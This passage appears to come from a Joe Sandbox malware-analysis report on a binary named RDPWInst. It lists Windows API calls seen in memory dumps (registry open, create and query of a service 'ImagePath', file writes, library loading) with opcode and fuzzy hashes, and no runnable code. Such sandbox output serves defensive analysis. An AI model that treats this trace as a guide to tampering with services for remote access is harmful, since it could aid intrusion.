                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,004392B4,?,?,ImagePath,00000000,004392B4), ref: 0043927D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID: ImagePath
                                                                                                                                  • API String ID: 3660427363-1008103227
                                                                                                                                  • Opcode ID: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                                                                  • Instruction ID: 752c998736a6c6af0e84b74aa330b189edc71255cbbe141243c37e1b481e64ab
                                                                                                                                  • Opcode Fuzzy Hash: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                                                                  • Instruction Fuzzy Hash: 90F01CA23042406FD744EA6E9C81F6B96DCDBCC714F14443EB288C7282D968CC098769
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A52
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A8C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 436179556-0
                                                                                                                                  • Opcode ID: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                                                                  • Instruction ID: 0ee4ecbf886d923d9c7bbf31fd477b4cbe2ff9aaa7d825c43a2ca86d525438e5
                                                                                                                                  • Opcode Fuzzy Hash: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                                                                  • Instruction Fuzzy Hash: E3315C70B04348AFDB11EBA98842B9EF7F9AB48304F50447EB544E7282DA78AF059759
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                                                                    • Part of subcall function 0040941C: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                                                                    • Part of subcall function 0040941C: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2912033995-0
                                                                                                                                  • Opcode ID: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                                                                  • Instruction ID: f6262d892358e01f8eacd9344567111696420312dcbdab07fa653b046a231d07
                                                                                                                                  • Opcode Fuzzy Hash: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                                                                  • Instruction Fuzzy Hash: 43114270A4421CABDB10EB51CD86BDD73B8DB04304F5144FBB509B72D1DA785E858A59
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F788
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F79A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1799206407-0
                                                                                                                                  • Opcode ID: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                                                                  • Instruction ID: 8407d2a862a87125c88b0e9e376b57c3f61afd3adb54f06dd13a213247f2bd06
                                                                                                                                  • Opcode Fuzzy Hash: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                                                                  • Instruction Fuzzy Hash: 5CE04F1732122016DD3530BC19CA6AB1244498B7A83280937FC51F3BD2D23E4D5B519F
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046DF
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004046E8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                  • Opcode ID: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                                                                  • Instruction ID: 9545df1e08670e3e4372b9a2ed629c94f39af83de60d034ef920510406bc5815
                                                                                                                                  • Opcode Fuzzy Hash: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                                                                  • Instruction Fuzzy Hash: D1E092B16041106BDB54CE6A9980A6723CC9B89354F008877BA04EB282E2B9CC015776
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(00449DB0,00000001,00000000), ref: 00414644
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00449DB0,00000001,00000000,?,00449EB4,00414694,00449EB4,00000000,?,0041770A,00000000,00417872), ref: 00414651
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCompareExchangeHandleInterlocked
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190309047-0
                                                                                                                                  • Opcode ID: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                                                                  • Instruction ID: 63ce862fb254c7bb27cf93041dcda8475e179d55c14a8c261316d7a773b2a43f
                                                                                                                                  • Opcode Fuzzy Hash: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                                                                  • Instruction Fuzzy Hash: 3FD0A7F275172033DA2021A94DC1FAB014C8B9975CF015563BE44EF283D59CCC9102FC
                                                                                                                                  APIs
                                                                                                                                  • RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                                                                  • RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseFlush
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 320916635-0
                                                                                                                                  • Opcode ID: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                                                                  • Instruction ID: 02ceb0405e4d458188627afd9845f8495605ad087acfb065aa2a027a14818eba
                                                                                                                                  • Opcode Fuzzy Hash: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                                                                  • Instruction Fuzzy Hash: 8DE0ECA1B003008ADF64FF7684C4A12B6D86F48304B48D4BAB808DE14BDA3CD4109725
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                                                                  • Instruction ID: 89278caf5ef83198d89b8dc4a9c9fb76eb3a10e2e46a05883e0df08903897f1a
                                                                                                                                  • Opcode Fuzzy Hash: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                                                                  • Instruction Fuzzy Hash: C921D370B04344AFDB11EB65C842B9EF7F99B48304F2144BEB804E3282DA7C9E059758
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004083CE
                                                                                                                                    • Part of subcall function 0040920C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                                                                    • Part of subcall function 0040920C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4113206344-0
                                                                                                                                  • Opcode ID: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                                                                  • Instruction ID: 90d1829834ce79f86c13b7573f8e9a8c333b05ddd33e28dd31ebb7d28ab9999b
                                                                                                                                  • Opcode Fuzzy Hash: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                                                                  • Instruction Fuzzy Hash: 84E0C9B1A003109BCB10DE58C9C5A477798AB48764F044AAAED64EF387D775DD1087D5
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,004257A8,0042F5F0,00000000,0042F6D7,?,?,004257A8), ref: 0040F68A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                                                                  • Instruction ID: 32e31081b98e7b24079041a639207f5f8240b3ca2c27c4b0157ee02f81a1b514
                                                                                                                                  • Opcode Fuzzy Hash: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                                                                  • Instruction Fuzzy Hash: 99E0C2A3B4072036F63072AD4C82FAB9158CB867B4F470336FA50FB2D2C0999C0241AC
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040F6D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                  • Opcode ID: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                                                                  • Instruction ID: 3fe4e569543b3f1381ab86603454923b4de8c4718f21568c98d02def12c07fd2
                                                                                                                                  • Opcode Fuzzy Hash: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                                                                  • Instruction Fuzzy Hash: 42D05BB63082507AD220D55B5C44DAB6BDCDBC5771F10063FB658C31C0D6308C05C275
                                                                                                                                  APIs
                                                                                                                                  • GetNativeSystemInfo.KERNEL32 ref: 0043A648
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                  • Opcode ID: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                                                                  • Instruction ID: fbf5644ea725b9a19c2d11835783dba3dfebd9b236010a27cc61b97838af9c82
                                                                                                                                  • Opcode Fuzzy Hash: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                                                                  • Instruction Fuzzy Hash: 66E086584BC14148C60523354C2F7A32688832A324F4D2923C4D985262E25FC0B77BAF
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,00447324,0043D137,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F7CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                                                                  • Instruction ID: dfbd20c989cc919aa742ea809a195094cafabb968b5a4f056a7cb7a67f60922a
                                                                                                                                  • Opcode Fuzzy Hash: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                                                                  • Instruction Fuzzy Hash: F3C08CA03012000AEE30B1BD1DCA80B02884A0D2383A02A37F069F3AD3D23E886F201A
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000001,0040F8C6,00000000,0040F8EB,?,00447324,00000000,00000000,00000000,00000000,?,0043D15F,00000000,0043D55E), ref: 0040FB69
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4241100979-0
                                                                                                                                  • Opcode ID: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                                                                  • Instruction ID: 5428b92e23564d17d1f876684be8f9c2b3243abbeaf0de8523baba27188e832a
